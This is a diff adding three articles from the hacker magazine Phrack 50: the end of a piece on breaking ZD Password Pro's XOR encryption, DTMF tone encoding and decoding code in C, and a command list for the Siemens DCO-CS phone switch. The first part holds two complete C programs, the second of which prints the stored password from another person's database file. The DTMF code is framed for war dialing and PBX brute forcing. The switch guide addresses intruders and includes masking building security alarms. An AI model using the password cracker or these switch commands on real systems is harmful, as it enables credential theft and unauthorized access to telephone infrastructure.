+I had no idea if this was the case or not, but if it proved to be true, there
+would still be other options available in attempting to read the entries, such
+as a dictionary attack.
+
+   To test my first theory, I created a user, blue, that I would attempt to
+break the security on.  I used the password "password", obviously a poor
+choice for a real application but since I was not going to mount a dictionary
+attack at this point, it was irrelevant.  I added an entry for this user for
+a fictitious system, account name, and password.  I then created a user,
+hacker, with no password on his account, and on database entries.  On my
+filesystem I then had a 166 byte blue.lst file and a 32 byte hacker.lst file.
+In order to merge the two files into one, I used the commands:
+
+     C:\PASSWORD> tail --bytes=134 blue.lst > blue.end
+     C:\PASSWORD> copy /b hacker.lst+blue.end > hacked.lst
+
+   I then loaded up Password Pro and attempted the username 'hacked'.  It
+prompted for a password and when I attempted none, it prompted me again.  It
+was clear that cracking this program was not going to be quite that trivial.
+
+   It was clear that all of the information necessary to attack the password
+was being stored somewhere in those first 32 bytes.  The easiest way to
+scramble the password would be a bit-shift (rot-13) or to XOR the password
+with a single character. If this was true, the password 'password' should
+show the two consecutive 's' characters as being the same value.  I looked
+through the hex dump of the file to see if this appeared to be true, and
+it wasn't.
+
+   The next complication in encryption is to XOR the files with a 'pad'.  This
+would mean that each letter in the password would be XOR-ed with a different
+byte, up to the length of the pad, and then it would start over XORing with
+the first letter of the pad, and so on.  If this were the case, changing one
+letter in my password would only change one byte in the file.  I created a
+password of 'pastword' and diffed the files; only 1 byte changed.  This looked
+promising, so it was time to extract the 'pad' from the file.  For an eight
+letter password, I need to find out what the 8 bytes being used to XOR the
+file are.  The way to do this is to simply take a file the program creates
+with a known password, and XOR the file with the password, resulting in the 
+pad.  This reverses what the program originally did, which was XOR the 
+password with the pad to create the file.
+
+<++> pwp-pad.c
+/* pwp-pad.c - ZD Password Pro for Windows Pad Reader (1/14/97)
+ *
+ * Syntax: pwp-pad filename.lst password
+ *
+ * Given a database file created by Password Pro and the password entered to
+ * protect the file, outputs the pad being used by Password Pro to encrypt
+ * files.
+ *
+ */
+
+#include <stdio.h>
+
+main(int argc, char **argv) {
+  FILE *fpass;
+  char pbuf[32], inbuf[32];
+  char *password, *pptr;
+  int i;
+
+  /* check command line arguments */
+  if(argc < 3) {
+    fprintf(stderr, "Syntax: %s filename.lst password\n", argv[0]);
+    exit(1);
+  }
+
+  password = argv[2];
+
+  /* open the file */
+  fpass = fopen(argv[1],"r");
+  if(!fpass) {
+    fprintf(stderr, "Unable to open file %s\n", argv[1]);
+    exit(1);
+  }
+
+  /* read from file */
+  if(fread(pbuf, 1, 32, fpass) != 32) {
+    fprintf(stderr, "Unable to read password entry from file.\n");
+    exit(1);
+  }
+
+  /* output pad by xor file contents with password from command line */
+  printf("Pad: ");
+  for(i=0; i<32 && pbuf[i]; i++) {
+    pbuf[i] ^= password[i];
+    printf("%x ", 0xff & pbuf[i]);
+  }
+  printf("\n");
+}
+<-->
+
+   Now that we have the pad, the next step is to use that pad to actually
+crack the contents of someone else's file.  The way we do that is by taking
+someone's lst file that we don't know the password for, and XORing the start
+of the file with the pad.  This will result in the password that they stored
+the file with, which we can then enter into the program to view the contents.
+
+<++>
+/* pwp-crack.c - ZD Password Pro for Windows Cracker (1/14/97)
+ *
+ * Syntax: pwp-crack filename.lst
+ *
+ * Outputs the password entered by the user of Password Pro to protect others
+ * from reading the contents of their account and password database.
+ *
+ */
+
+#include <stdio.h>
+
+main(int argc, char **argv) {
+  FILE *fin;
+  char inbuf[32];
+  char pad[] = { 0x38, 0x17, 0x2b, 0x8c, 0x59, 0xaf, 0xe6, 0x03, 0x61, 0x85 };
+  int i;
+
+  if(argc < 2) {
+    fprintf(stderr, "Syntax: %s filename.lst\n\n", argv[0]);
+    exit(1);
+  }
+
+  fin = fopen(argv[1],"r");
+  if(!fin) {
+    fprintf(stderr, "Unable to open %s for reading\n", argv[1]);
+    exit(1);
+  }
+
+  if(fread(inbuf, 1, 32, fin) != 32) {
+    fprintf(stderr, "Unable to read password from file.\n");
+    exit(1);
+  }
+  
+  printf("Password: ");
+  for(i=0; i<32 && inbuf[i]; i++) {
+    inbuf[i] ^= pad[i % sizeof(pad)];
+    printf("%c", inbuf[i]);
+  }
+  printf("\n");
+}
+
+<-->
+
+
+V.  Conclusion
+
+   If you are interested in any of this, I strongly encourage you to go out
+and find holes and write exploits on your own.  I'm sure Phrack would love 
+to hear about any findings you make, so let us know how you are doing.
+
+   If you are a software developer and are interested in avoiding become a 
+victim of one of Phrack's budding hackers, or just want to learn more about
+practical crytography, I suggest you pick up a copy of Bruce Schneier's 
+Applied Cryptography available at any big bookstore.  
+   
+EOF
diff --git a/phrack50/13.txt b/phrack50/13.txt
new file mode 100644
index 0000000..18b9757
--- /dev/null
+++ b/phrack50/13.txt
@@ -0,0 +1,685 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                     13 of 16
+ 
+                         ===============================
+                         DTMF Encoding and Decoding In C
+                                    by Mr. Blue
+                         ===============================
+
+  
+Introduction
+------------
+    DTMF tones are the sounds emitted when you dial a number on your touch 
+tone phone.  Modems have traditionally been the device used to generate
+these tones from a computer.  But the more sophisticated modems on the
+market today are nothing more than a DSP (digital signal processor) with
+accompanying built-in software to generate and interpet analog sounds into
+digital data.  The computers sitting on your desk have more cpu power,
+a more complex OS, and very often a just as sophisticated DSP.  There is
+no reason you can not duplicate the functionality of a modem from right
+inside of unix software, providing you with a lot easier to understand and
+modify code.  
+
+    In this article I provide the source code to both encode and decode
+DTMF tones.  There are numerous uses for this code, for use in unix based 
+phone scanning and war dialing programs, voice mail software, automated
+pbx brute force hacking, and countless other legitimate and not so
+legitimate uses.
+
+    I will not go into depth explaining the underlying mathematical
+theories behind this code.  If you are of a sufficient math background I
+would encourage you to research and learn about the algorithms used from
+your local college library; it is not my intent to summarize these
+algorithms, only to provide unix C code that can be used on its own or
+expanded to be used as part of a larger program.  
+
+    Use the extract utility included with Phrack to save the individual
+source files out to the dtmf/ directory.  If you find this code useful, I
+would encourage you to show your appreciation by sharing some of your own
+knowledge with Phrack.    
+
+<++> dtmf/detect.h
+/* 
+ *
+ * goertzel aglorithm, find the power of different
+ * frequencies in an N point DFT.
+ *
+ * ftone/fsample = k/N   
+ * k and N are integers.  fsample is 8000 (8khz)
+ * this means the *maximum* frequency resolution
+ * is fsample/N (each step in k corresponds to a
+ * step of fsample/N hz in ftone)
+ *
+ * N was chosen to minimize the sum of the K errors for
+ * all the tones detected...  here are the results :
+ *
+ * Best N is 240, with the sum of all errors = 3.030002
+ * freq  freq actual   k     kactual  kerr
+ * ---- ------------  ------ ------- -----
+ *  350 (366.66667)   10.500 (11)    0.500
+ *  440 (433.33333)   13.200 (13)    0.200
+ *  480 (466.66667)   14.400 (14)    0.400
+ *  620 (633.33333)   18.600 (19)    0.400
+ *  697 (700.00000)   20.910 (21)    0.090
+ *  700 (700.00000)   21.000 (21)    0.000
+ *  770 (766.66667)   23.100 (23)    0.100
+ *  852 (866.66667)   25.560 (26)    0.440
+ *  900 (900.00000)   27.000 (27)    0.000
+ *  941 (933.33333)   28.230 (28)    0.230
+ * 1100 (1100.00000)  33.000 (33)    0.000
+ * 1209 (1200.00000)  36.270 (36)    0.270
+ * 1300 (1300.00000)  39.000 (39)    0.000
+ * 1336 (1333.33333)  40.080 (40)    0.080
+ **** I took out 1477.. too close to 1500
+ * 1477 (1466.66667)  44.310 (44)    0.310
+ ****
+ * 1500 (1500.00000)  45.000 (45)    0.000
+ * 1633 (1633.33333)  48.990 (49)    0.010
+ * 1700 (1700.00000)  51.000 (51)    0.000
+ * 2400 (2400.00000)  72.000 (72)    0.000
+ * 2600 (2600.00000)  78.000 (78)    0.000
+ *
+ * notice, 697 and 700hz are indestinguishable (same K)
+ * all other tones have a seperate k value.  
+ * these two tones must be treated as identical for our
+ * analysis.
+ *
+ * The worst tones to detect are 350 (error = 0.5, 
+ * detet 367 hz) and 852 (error = 0.44, detect 867hz). 
+ * all others are very close.
+ *
+ */
+
+#define FSAMPLE  8000
+#define N        240
+
+int k[] = { 11, 13, 14, 19, 21, 23, 26, 27, 28, 33, 36, 39, 40,
+ /*44,*/ 45, 49, 51, 72, 78, };
+
+/* coefficients for above k's as:
+ *   2 * cos( 2*pi* k/N )
+ */
+float coef[] = {
+1.917639, 1.885283, 1.867161, 1.757634, 
+1.705280, 1.648252, 1.554292, 1.520812, 1.486290, 
+1.298896, 1.175571, 1.044997, 1.000000, /* 0.813473,*/ 
+0.765367, 0.568031, 0.466891, -0.618034, -0.907981,  };
+
+#define X1    0    /* 350 dialtone */
+#define X2    1    /* 440 ring, dialtone */
+#define X3    2    /* 480 ring, busy */
+#define X4    3    /* 620 busy */
+
+#define R1    4    /* 697, dtmf row 1 */
+#define R2    5    /* 770, dtmf row 2 */
+#define R3    6    /* 852, dtmf row 3 */
+#define R4    8    /* 941, dtmf row 4 */
+#define C1   10    /* 1209, dtmf col 1 */
+#define C2   12    /* 1336, dtmf col 2 */
+#define C3   13    /* 1477, dtmf col 3 */
+#define C4   14    /* 1633, dtmf col 4 */
+
+#define B1    4    /* 700, blue box 1 */
+#define B2    7    /* 900, bb 2 */
+#define B3    9    /* 1100, bb 3 */
+#define B4   11    /* 1300, bb4 */
+#define B5   13    /* 1500, bb5 */
+#define B6   15    /* 1700, bb6 */
+#define B7   16    /* 2400, bb7 */
+#define B8   17    /* 2600, bb8 */
+
+#define NUMTONES 18 
+
+/* values returned by detect 
+ *  0-9     DTMF 0 through 9 or MF 0-9
+ *  10-11   DTMF *, #
+ *  12-15   DTMF A,B,C,D
+ *  16-20   MF last column: C11, C12, KP1, KP2, ST
+ *  21      2400
+ *  22      2600
+ *  23      2400 + 2600
+ *  24      DIALTONE
+ *  25      RING
+ *  26      BUSY
+ *  27      silence
+ *  -1      invalid
+ */
+#define D0    0
+#define D1    1
+#define D2    2
+#define D3    3
+#define D4    4
+#define D5    5
+#define D6    6
+#define D7    7
+#define D8    8
+#define D9    9
+#define DSTAR 10
+#define DPND  11
+#define DA    12
+#define DB    13
+#define DC    14
+#define DD    15
+#define DC11  16
+#define DC12  17
+#define DKP1  18
+#define DKP2  19
+#define DST   20
+#define D24   21 
+#define D26   22
+#define D2426 23
+#define DDT   24
+#define DRING 25
+#define DBUSY 26
+#define DSIL  27
+
+/* translation of above codes into text */
+char *dtran[] = {
+  "0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
+  "*", "#", "A", "B", "C", "D", 
+  "+C11 ", "+C12 ", " KP1+", " KP2+", "+ST ",
+  " 2400 ", " 2600 ", " 2400+2600 ",
+  " DIALTONE ", " RING ", " BUSY ","" };
+
+#define RANGE  0.1           /* any thing higher than RANGE*peak is "on" */
+#define THRESH 100.0         /* minimum level for the loudest tone */
+#define FLUSH_TIME 100       /* 100 frames = 3 seconds */
+
+<-->
+<++> dtmf/detect.c
+
+/*
+ * detect.c
+ * This program will detect MF tones and normal
+ * dtmf tones as well as some other common tones such
+ * as BUSY, DIALTONE and RING.
+ * The program uses a goertzel algorithm to detect
+ * the power of various frequency ranges.
+ *
+ * input is assumed to be 8 bit samples.  The program
+ * can use either signed or unsigned samples according
+ * to a compile time option:
+ *
+ *    cc  -DUNSIGNED detect.c -o detect
+ *
+ * for unsigned input (soundblaster) and:
+ *
+ *    cc  detect.c -o detect
+ *
+ * for signed input (amiga samples)
+ * if you dont want flushes,  -DNOFLUSH
+ * 
+ *                            Tim N.
+ */
+
+#include <stdio.h>
+#include <math.h>
+#include "detect.h"
+
+/*
+ * calculate the power of each tone according
+ * to a modified goertzel algorithm described in
+ *  _digital signal processing applications using the
+ *  ADSP-2100 family_ by Analog Devices
+ *
+ * input is 'data',  N sample values
+ *
+ * ouput is 'power', NUMTONES values
+ *  corresponding to the power of each tone 
+ */
+calc_power(data,power)
+#ifdef UNSIGNED
+unsigned char *data;
+#else
+char *data;
+#endif
+float *power;
+{
+  float u0[NUMTONES],u1[NUMTONES],t,in;
+  int i,j;
+  
+  for(j=0; j<NUMTONES; j++) {
+    u0[j] = 0.0;
+    u1[j] = 0.0;
+  }
+  for(i=0; i<N; i++) {   /* feedback */
+#ifdef UNSIGNED
+    in = ((int)data[i] - 128) / 128.0;
+#else
+    in = data[i] / 128.0;
+#endif
+    for(j=0; j<NUMTONES; j++) {
+      t = u0[j];
+      u0[j] = in + coef[j] * u0[j] - u1[j];
+      u1[j] = t;
+    }
+  }
+  for(j=0; j<NUMTONES; j++)   /* feedforward */
+    power[j] = u0[j] * u0[j] + u1[j] * u1[j] - coef[j] * u0[j] * u1[j]; 
+  return(0);
+}
+
+
+/*
+ * detect which signals are present.
+ *
+ * return values defined in the include file
+ * note: DTMF 3 and MF 7 conflict.  To resolve
+ * this the program only reports MF 7 between
+ * a KP and an ST, otherwise DTMF 3 is returned
+ */
+decode(data)
+char *data;
+{
+  float power[NUMTONES],thresh,maxpower;
+  int on[NUMTONES],on_count;
+  int bcount, rcount, ccount;
+  int row, col, b1, b2, i;
+  int r[4],c[4],b[8];
+  static int MFmode=0;
+  
+  calc_power(data,power);
+  for(i=0, maxpower=0.0; i<NUMTONES;i++)
+    if(power[i] > maxpower)
+      maxpower = power[i]; 
+/*
+for(i=0;i<NUMTONES;i++) 
+  printf("%f, ",power[i]);
+printf("\n");
+*/
+
+  if(maxpower < THRESH)  /* silence? */ 
+    return(DSIL);
+  thresh = RANGE * maxpower;    /* allowable range of powers */
+  for(i=0, on_count=0; i<NUMTONES; i++) {
+    if(power[i] > thresh) { 
+      on[i] = 1;
+      on_count ++;
+    } else
+      on[i] = 0;
+  }
+
+/*
+printf("%4d: ",on_count);
+for(i=0;i<NUMTONES;i++)
+  putchar('0' + on[i]);
+printf("\n");
+*/
+
+  if(on_count == 1) {
+    if(on[B7]) 
+      return(D24);
+    if(on[B8])
+      return(D26);
+    return(-1);
+  }
+ 
+  if(on_count == 2) {
+    if(on[X1] && on[X2])
+      return(DDT);
+    if(on[X2] && on[X3])
+      return(DRING);
+    if(on[X3] && on[X4])
+      return(DBUSY);
+    
+    b[0]= on[B1]; b[1]= on[B2]; b[2]= on[B3]; b[3]= on[B4];
+    b[4]= on[B5]; b[5]= on[B6]; b[6]= on[B7]; b[7]= on[B8];
+    c[0]= on[C1]; c[1]= on[C2]; c[2]= on[C3]; c[3]= on[C4];
+    r[0]= on[R1]; r[1]= on[R2]; r[2]= on[R3]; r[3]= on[R4];
+
+    for(i=0, bcount=0; i<8; i++) {
+      if(b[i]) {
+        bcount++;
+        b2 = b1;
+        b1 = i;
+      }
+    }
+    for(i=0, rcount=0; i<4; i++) {
+      if(r[i]) {
+        rcount++;
+        row = i;
+      }
+    }
+    for(i=0, ccount=0; i<4; i++) {
+      if(c[i]) {
+        ccount++;
+        col = i;
+      }
+    }
+
+    if(rcount==1 && ccount==1) {   /* DTMF */
+      if(col == 3)  /* A,B,C,D */
+        return(DA + row);
+      else {
+        if(row == 3 && col == 0 ) 
+           return(DSTAR);
+        if(row == 3 && col == 2 )
+           return(DPND);
+        if(row == 3)
+           return(D0);
+        if(row == 0 && col == 2) {   /* DTMF 3 conflicts with MF 7 */
+          if(!MFmode)
+            return(D3);
+        } else 
+          return(D1 + col + row*3);
+      }
+    }
+
+    if(bcount == 2) {       /* MF */
+      /* b1 has upper number, b2 has lower */
+      switch(b1) {
+        case 7: return( (b2==6)? D2426: -1); 
+        case 6: return(-1);
+        case 5: if(b2==2 || b2==3)  /* KP */
+                  MFmode=1;
+                if(b2==4)  /* ST */
+                  MFmode=0; 
+                return(DC11 + b2);
+        /* MF 7 conflicts with DTMF 3, but if we made it
+         * here then DTMF 3 was already tested for 
+         */
+        case 4: return( (b2==3)? D0: D7 + b2);
+        case 3: return(D4 + b2);
+        case 2: return(D2 + b2);
+        case 1: return(D1);
+      }
+    }
+    return(-1);
+  }
+
+  if(on_count == 0)
+    return(DSIL);
+  return(-1); 
+}
+
+read_frame(fd,buf)
+int fd;
+char *buf;
+{
+  int i,x;
+
+  for(i=0; i<N; ) {
+    x = read(fd, &buf[i], N-i);
+    if(x <= 0) 
+      return(0);
+    i += x;
+  } 
+  return(1);
+}
+
+/*
+ * read in frames, output the decoded
+ * results
+ */
+dtmf_to_ascii(fd1, fd2)
+int fd1;
+FILE *fd2;
+{
+  int x,last= DSIL;
+  char frame[N+5];
+  int silence_time;
+
+  while(read_frame(fd1, frame)) {
+    x = decode(frame); 
+/*
+if(x== -1) putchar('-');
+if(x==DSIL) putchar(' ');
+if(x!=DSIL && x!=-1) putchar('a' + x);
+fflush(stdout);
+continue;
+*/
+
+    if(x >= 0) {
+      if(x == DSIL)
+        silence_time += (silence_time>=0)?1:0 ;
+      else
+        silence_time= 0;
+      if(silence_time == FLUSH_TIME) {
+        fputs("\n",fd2);
+        silence_time= -1;   /* stop counting */
+      }
+
+      if(x != DSIL && x != last &&
+         (last == DSIL || last==D24 || last == D26 ||
+          last == D2426 || last == DDT || last == DBUSY ||
+          last == DRING) )  { 
+        fputs(dtran[x], fd2);
+#ifndef NOFLUSH
+        fflush(fd2);
+#endif
+      }
+      last = x;
+    }
+  }
+  fputs("\n",fd2);
+}
+
+main(argc,argv) 
+int argc;
+char **argv;
+{
+  FILE *output;
+  int input;
+
+  input = 0;
+  output = stdout;
+  switch(argc) {
+    case 1:  break;
+    case 3:  output = fopen(argv[2],"w");
+             if(!output) {
+               perror(argv[2]);
+               return(-1);
+             }
+             /* fall through */
+    case 2:  input = open(argv[1],0);
+             if(input < 0) {
+               perror(argv[1]);
+               return(-1);
+             }
+             break;
+     default:
+        fprintf(stderr,"usage:  %s [input [output]]\n",argv[0]);
+        return(-1);
+  }
+  dtmf_to_ascii(input,output);
+  fputs("Done.\n",output);
+  return(0);
+}
+
+<-->
+<++> dtmf/gen.c
+
+/* -------- local defines (if we had more.. seperate file) ----- */
+#define FSAMPLE   8000   /* sampling rate, 8KHz */
+
+/*
+ * FLOAT_TO_SAMPLE converts a float in the range -1.0 to 1.0 
+ * into a format valid to be written out in a sound file
+ * or to a sound device 
+ */
+#ifdef SIGNED
+#  define FLOAT_TO_SAMPLE(x)    ((char)((x) * 127.0))
+#else
+#  define FLOAT_TO_SAMPLE(x)    ((char)((x + 1.0) * 127.0))
+#endif
+
+#define SOUND_DEV  "/dev/dsp"
+typedef char sample;
+/* --------------------------------------------------------------- */
+
+#include <fcntl.h>
+
+/*
+ * take the sine of x, where x is 0 to 65535 (for 0 to 360 degrees)
+ */
+float mysine(in)
+short in;
+{
+  static coef[] = {
+     3.140625, 0.02026367, -5.325196, 0.5446778, 1.800293 };
+  float x,y,res;
+  int sign,i;
+ 
+  if(in < 0) {       /* force positive */
+    sign = -1;
+    in = -in;
+  } else
+    sign = 1;
+  if(in >= 0x4000)      /* 90 degrees */
+    in = 0x8000 - in;   /* 180 degrees - in */
+  x = in * (1/32768.0); 
+  y = x;               /* y holds x^i) */
+  res = 0;
+  for(i=0; i<5; i++) {
+    res += y * coef[i];
+    y *= x;
+  }
+  return(res * sign); 
+}
+
+/*
+ * play tone1 and tone2 (in Hz)
+ * for 'length' milliseconds
+ * outputs samples to sound_out
+ */
+two_tones(sound_out,tone1,tone2,length)
+int sound_out;
+unsigned int tone1,tone2,length;
+{
+#define BLEN 128
+  sample cout[BLEN];
+  float out;
+  unsigned int ad1,ad2;
+  short c1,c2;
+  int i,l,x;
+   
+  ad1 = (tone1 << 16) / FSAMPLE;
+  ad2 = (tone2 << 16) / FSAMPLE;
+  l = (length * FSAMPLE) / 1000;
+  x = 0;
+  for( c1=0, c2=0, i=0 ;
+       i < l;
+       i++, c1+= ad1, c2+= ad2 ) {
+    out = (mysine(c1) + mysine(c2)) * 0.5;
+    cout[x++] = FLOAT_TO_SAMPLE(out);
+    if (x==BLEN) {
+      write(sound_out, cout, x * sizeof(sample));
+      x=0;
+    }
+  }
+  write(sound_out, cout, x);
+}
+
+/*
+ * silence on 'sound_out'
+ * for length milliseconds
+ */
+silence(sound_out,length)
+int sound_out;
+unsigned int length;
+{
+  int l,i,x;
+  static sample c0 = FLOAT_TO_SAMPLE(0.0);
+  sample cout[BLEN];
+
+  x = 0;
+  l = (length * FSAMPLE) / 1000;
+  for(i=0; i < l; i++) {
+    cout[x++] = c0;
+    if (x==BLEN) {
+      write(sound_out, cout, x * sizeof(sample));
+      x=0;
+    }
+  }
+  write(sound_out, cout, x);
+}
+
+/*
+ * play a single dtmf tone
+ * for a length of time,
+ * input is 0-9 for digit, 10 for * 11 for #
+ */
+dtmf(sound_fd, digit, length)
+int sound_fd;
+int digit, length;
+{
+  /* Freqs for 0-9, *, # */
+  static int row[] = {
+    941, 697, 697, 697, 770, 770, 770, 852, 852, 852, 941, 941 };
+  static int col[] = {
+    1336, 1209, 1336, 1477, 1209, 1336, 1477, 1209, 1336, 1447,
+    1209, 1477 };
+
+  two_tones(sound_fd, row[digit], col[digit], length);
+}
+
+/*
+ * take a string and output as dtmf
+ * valid characters, 0-9, *, #
+ * all others play as 50ms silence 
+ */
+dial(sound_fd, number)
+int sound_fd;
+char *number;
+{
+  int i,x;
+  char c;
+
+  for(i=0;number[i];i++) {
+     c = number[i];
+     x = -1;
+     if(c >= '0' && c <= '9')
+       x = c - '0';
+     else if(c == '*')
+       x = 10;
+     else if(c == '#')
+       x = 11;
+     if(x >= 0)
+       dtmf(sound_fd, x, 50);
+     silence(sound_fd,50);
+  }
+}
+
+main()
+{
+  int sfd;
+  char number[100];
+
+  sfd = open(SOUND_DEV,O_RDWR);
+  if(sfd<0) {
+    perror(SOUND_DEV);
+    return(-1);
+  }
+  printf("Enter fone number: ");
+  gets(number);
+  dial(sfd,number);
+}
+<-->
+<++> dtmf/Makefile
+#
+# Defines:
+#  UNSIGNED  -  use unsigned 8 bit samples
+#               otherwise use signed 8 bit samples
+#
+
+CFLAGS= -DUNSIGNED
+
+default:	detect gen
+
+detect: detect.c
+	$(CC) detect.c -o detect
+
+gen:	gen.c
+	$(CC) gen.c -o gen
+
+clobber: clean
+	rm -rf detect gen 
+
+clean:
+	rm -rf *.o core a.out
+<-->
+
+EOF
diff --git a/phrack50/14.txt b/phrack50/14.txt
new file mode 100644
index 0000000..b5552d8
--- /dev/null
+++ b/phrack50/14.txt
@@ -0,0 +1,304 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                     14 of 16
+                                                 
+                     //===============================\\
+                     ||  The DCO-CS Operating System  ||
+                     ||              -*-              ||
+                     ||                               ||
+                     || by Trunkin' Fool AKA mrnobody ||
+                     ||             4.1.97            ||
+                     \\===============================//
+
+
+	OK... this is the first part of what (hopefully) will be a little
+series type thing of articles on the DCO operating system, which is from
+Siemens.  DCO is run on an LLS/RLS-1000/RLS-4000 machine. It has
+psychotically mad logging, but the logs are configurable from the admin
+accounts.  The DCO box I was using just happened to only have a 1200 bps
+dialup, so some operations (i.e. listing INWATS trunks and what they route
+to) were painfully slow considering the large amount of trunks this thing
+can control.  It is similar to a 4ESS in some ways, and offers some PABX
+functions.  A guy can have lots of fun with one of these things...
+
+        Some features/specifications:
+
+        Billing Computer Interface
+        --------------------------
+        "The DCO-CS collects AMA data and provides direct data interface with
+        your business computer, as well as 1600 BPI magnetic tape backup
+        or primary data collector"
+
+        International Callback
+        ----------------------
+        "Allows the system to place a return call to an international
+        subscriber for the dialed domestic number originally called, either
+        through a live or automated operator position."
+
+        ISDN Transport
+        --------------
+        The DCO-CS is capable of switching 64 Kb/s data. This allows people
+        (customers, hehe) to switch Primary and Basic Rate ISDN traffic.
+
+        LEC Services
+        ------------
+        Full LEC services are offered, including POTS (duh), Centrex &
+        Enhanced Centrex (combines ISDN & POTS lines in the same Centrex
+        groups, direct inward dialing, call forwarding, hold, call transfer,
+        intercom, conferencing, OUTWATS over line groups of any size.), CLASS
+        including calling number delivery and display, selective call blocking
+        and forwarding, automatic recall and call trace.
+
+
+        "Hacker intrusion is detected and 'thwarted' by sophisticated pattern
+recognition software.  The DCO-CS switch lets you detect abused authorization
+codes and service-denied authorization codes and automatically route the
+calls to your service departments.  The system also offers timed threshold
+levels for both ANI and authorization codes as another form of fraud
+protection.  It delivers detailed traffic and facilities usage reports to help
+you plan the optimum use of your private and leased facilities."
+
+                                --Siemens Stromberg-Carlson
+
+        Calls are processed simultaneously with separate processors and
+switching matrices.  In the event of a failure, not even calls in the process
+of being switched are lost because when the failure occurs, the system simply 
+switches to "its redundant processor and memory".
+
+        I guess that before I dive straight into the commands, I should
+discuss something pretty damn important.  That something is MMI. MMI
+stands for Man-Machine-Interface,and is basically the 'shell' for this
+system.  First off, in MMI, every command is prefixed by a '$', ie, to run
+the account maintenance program, "passwm", one would type: "$PASSWM",
+without the quotes. Always put a comma between parameters. For example,
+say that a program ADDTFREE requires the parameters SAC(service access
+code),Toll-Free Number, and the Trunk to Assign the Toll-Free number to.
+The hypothetical command to add a tollfree number, 555-6969, with a SAC of
+800, for example, and route it to (123)456-7890, would be: 
+
+    "$ADDTFREE 800,5556969,1234567890" 
+
+(without the quotes). The ';' denotes a line terminator. For example, to run 
+a program PROG1, which,say, clears the terminal screen, and the INWANI
+utility, one would type: "$PROG1;$INWANI", without the quotes. The ""
+(quotes) are used to contain a string of one or more characters. A string
+is considered anything that contains either a blank or comma not being
+used as a delimiter. The '\' allows special characters to be input to
+tasks (similar to linux/unix?). And finally, the ':' is synonymous to done
+(whatever that means).
+
+        Some more on MMI... The command line/response length is 65 characters,
+so anything longer than 65 will be truncated.  Exit is a valid response at any
+prompt.  Help is also valid and lists the valid responses with descriptions.
+To automatically display the help information prior to all prompts, type
+"HELP=ON" without the quotes.  "HELP=OFF" disables this function. The '^' is
+used to back up a menu.  Control-P cancels a function in progress. The '&'
+represents logical AND.  However, the '&&' represents a logical inclusive.
+The '*' is a wildcard, and allows the user to select the entire range of
+possibilities.
+
+        'Option Words'- the option word is entered on the command line
+after the task(command) name.  The Option Word can be either in octal or
+ASCII.
+
+Value   ASCII           Definition
+-F1     /NODIAL         no dialogue (header or trailer msg output) to terminal
+-F2     /OFFLINE        Request communication with offline CP
+-F4     /NOCOMM         No user input. All input must be on the command line
+-F40    /NOPAGE         Do not paginate output.
+        Values may be added together to indicate multiple options, eg:
+-F3 = -F1 and -F2.
+
+        One final thing: I said that all commands must be prefixed with a '$',
+however, this does not apply to input, ie when inside a program it is not
+necessary.
+
+        The next part is basically just a command list for DCO. I will do
+a more detailed (tutorial even) as i learn more and as people ask for one,
+or if I just feel like writing it (and I probably do, as I have read Phrack
+for some time and always wanted to contribute). One last warning: the LLS/RLS
+is a fairly large system, so be VERY CAREFUL as one can do about as many
+bad things as good things if you're not careful.
+	
+	So... without further ado, heres the command list:
+
+Command   ~   Description
+-------       -----------
+ABNUTL    -   perform automatic balance network (ABN) functions
+ABORT     -   abort operation of an active task
+ACISU     -   alarm control interface start up
+ACITST    -   alarm control interface test
+ACTUTL    -   display/clear/acknowledge active alarms
+ADMIN     -   recent change/database administration
+ALMSEN    -   switch between local and remote alarm reporting
+AMA       -   configure automatic message accounting (AMA)
+AMCDMP    -   administer AMA message thresholds
+AMFMAU    -   verify formatted AMA tickets
+AMOPT     -   administer system options
+AMPRPT    -   set frequency of repeat notification of alarms
+AMPUTL    -   alarm message processing utility
+AUDIT     -   verify software record of hardware states match actual hardware
+BKRNS     -   backup RNS disk at the host office
+BLDINH    -   mask/unmask building security alarm (heh, this should be fun)
+BUFDMP    -   search/clear/dump CP buffers
+CANCEL    -   cancel wait timer for TID and IDN
+CBUG      -   debug utility for LLS/RLS-1000 and CODC devices
+CHEKER    -   compare MP memory to disk
+CHKUTL    -   verify disk integrity (DCO equivalent of scandisk for dos)
+CLEAR     -   initialize span error counters
+CODE      -   DCO-CS customer routing
+CONFIG    -   configuration control (load,switch,mask, etc.)
+CONUTL    -   convert equipment numbers
+COPY      -   copy databases from memory to disk
+CPDMP     -   display data collected from a CP crash
+CPPTCH    -   call processing patch utility
+CPREST    -   online CP reset
+CPSRCH    -   search CP buffer
+CPSU      -   call processing startup
+CSADM     -   DCO-CS administer ANI DN's and auth codes
+DBADMN    -   DCO-CS change max entries in selected tables
+DBUTL     -   administer MP database parameters
+DBVER     -   database verifications and configuration reports
+DEBUG     -   debug utility for MP
+DEVMOU    -   build config file to rebuild system mount status
+DIAG2     -   manually diagnose/verify fault in the MOS side of the system
+DIAG3     -   manual diagnostics to test forced faults
+DMPUTL    -   duplex MP utility (switchover,download,lock,etc.)
+DNAUTL    -   directory number audit utility
+DTIUTL    -   configure/status of DTI/DS1M for LLS/RLS-1000/RLS-4000
+DUMPER    -   dump raw data records from disk
+ECCRPT    -   report 1-bit parity errors corrected in MP/CP/FP
+ECD       -   display error counters
+EDIT      -   DCO system editor
+EQCHEK    -   test access to equipped hardware
+FILSYS    -   perform file or disk manipulation functions
+FLSH      -   flush alarm message processing buffers
+FLXANI    -   DCO-CS administer FLEX ANI tables
+FPBUG     -   debug utility for FP
+FPCDMP    -   display/save data collected from FP crash
+FPSU      -   FP start up
+FREE      -   display number of free blocks in MP memory
+FXLN      -   administer/configure FX communications to an RNS
+GBUG      -   generic debug utility
+HEY       -   MP operating system task completion advisor
+HSTUTL    -   collect/retrieve alarm message history
+HOTLIN    -   DCO-CS administer hotline database
+INSTAL    -   MP operating system manual task installer
+INWANI    -   DCO-CS administer INWATS number routed by NPA/NXX
+INWATS    -   DCO-CS administer incoming toll free (INWATS) service
+ISUUTL    -   administer alarm level priorities and conditions
+LLC       -   line load control of subscriber lines
+LOGOFF    -   logs off the terminal
+LSPT      -   light traffic tests (avoid running during heavy traffic)
+MACLR     -   clear memory audit data
+MANUAL    -   manual control of ports
+MAUDIT    -   memory audit routine
+MBI       -   report masks and errors on MBI bus
+MEMCHK    -   report differences between CP memory (generic code) and disk
+MEMMAP    -   display memory map
+MODEM     -   administer system parameters for modem security
